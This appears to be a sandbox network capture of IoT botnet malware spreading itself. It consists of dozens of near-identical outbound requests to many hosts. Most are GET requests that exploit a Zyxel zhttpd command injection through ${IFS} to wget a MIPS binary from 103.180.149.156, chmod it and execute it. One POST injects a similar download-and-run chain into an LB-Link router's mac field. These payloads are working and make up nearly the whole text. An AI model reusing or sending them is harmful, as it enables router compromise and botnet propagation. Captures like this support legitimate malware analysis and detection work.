                                                        Feb 2, 2024 06:21:20.138096094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7024192.168.2.144151684.46.24.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.138148069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7025192.168.2.1454794219.107.227.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.138184071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7026192.168.2.143934443.177.123.62443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.138221025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7027192.168.2.1440562128.173.115.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.138262987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7028192.168.2.1444456143.229.105.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.138319016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7029192.168.2.1452474114.180.251.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.138339996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7030192.168.2.146053620.236.213.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.138391018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7031192.168.2.1456030157.80.201.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.138422012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7032192.168.2.1449104145.233.88.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.138453960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7033192.168.2.1454858222.17.66.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.138504982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7034192.168.2.145030494.234.65.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.138531923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7035192.168.2.1454404161.238.217.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.138573885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7036192.168.2.1457256210.140.31.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.138607025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7037192.168.2.1445354191.15.240.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.138652086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7038192.168.2.1436014129.8.155.224443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.138711929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7039192.168.2.144023480.113.179.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.138761044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7040192.168.2.1440354192.86.9.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.138782978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7041192.168.2.1454930139.205.69.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.138842106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7042192.168.2.145258240.22.64.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.138878107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7043192.168.2.1439718102.143.151.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.138922930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7044192.168.2.143967488.136.28.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.138969898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7045192.168.2.1448612125.150.220.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.139007092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7046192.168.2.1434686147.52.150.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.139046907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7047192.168.2.145403247.87.214.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.139066935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7048192.168.2.144472844.16.190.143443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.139117956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7049192.168.2.145535050.109.65.88443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.139142036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7050192.168.2.144936246.207.214.147443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.139194012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7051192.168.2.1442266107.10.81.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.139225006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7052192.168.2.1450350130.126.168.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.139271021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7053192.168.2.1448088192.239.149.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.139312983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7054192.168.2.144515232.54.30.61443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.139363050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7055192.168.2.144089427.191.14.8443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.139422894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7056192.168.2.1453664199.97.64.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.139467955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7057192.168.2.14506788.209.9.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.139506102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7058192.168.2.146084665.10.194.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.139558077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7059192.168.2.1442086153.48.131.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.139585972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7060192.168.2.1451894123.112.48.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.139616013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7061192.168.2.1457708195.112.191.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.139668941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7062192.168.2.143387273.53.153.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.139695883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7063192.168.2.143909442.159.92.126443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.139722109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7064192.168.2.1453818144.78.186.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.146785021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7065192.168.2.145137223.224.101.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.146877050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7066192.168.2.1448598124.151.63.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.146903038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7067192.168.2.1437790148.231.90.154443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.146959066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7068192.168.2.144608073.142.128.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.146974087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7069192.168.2.1447432172.216.213.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.147033930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7070192.168.2.1456316143.237.8.75443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:20.147140980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7071192.168.2.14451408.46.162.468080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.103529930 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                        Feb 2, 2024 06:21:21.226861000 CET470INHTTP/1.1 404 Not Found
                                                        Server: httpd
                                                        Date: Thu, 01 Feb 2024 21:22:05 GMT
                                                        Content-Type: text/html
                                                        Content-Security-Policy: default-src 'self' www.linksys.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; img-src 'self' data:;
                                                        X-Content-Security-Policy: default-src 'self' www.linksys.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; img-src 'self' data:;
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7072192.168.2.1437472145.71.147.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.155579090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7073192.168.2.1455632217.17.147.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.155618906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7074192.168.2.145859687.154.104.51443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.155666113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7075192.168.2.1438086121.51.251.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.155699015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7076192.168.2.1433754196.145.91.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.155745983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7077192.168.2.144223852.184.158.220443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.155802011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7078192.168.2.1457304165.236.224.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.155836105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7079192.168.2.144568483.169.37.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.155850887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7080192.168.2.144184018.121.235.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.155904055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7081192.168.2.144475458.159.35.140443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.155955076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7082192.168.2.1446732115.249.242.52443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.155983925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7083192.168.2.1454612130.158.195.101443
                                                        TimestampBytes transferredDirectionData
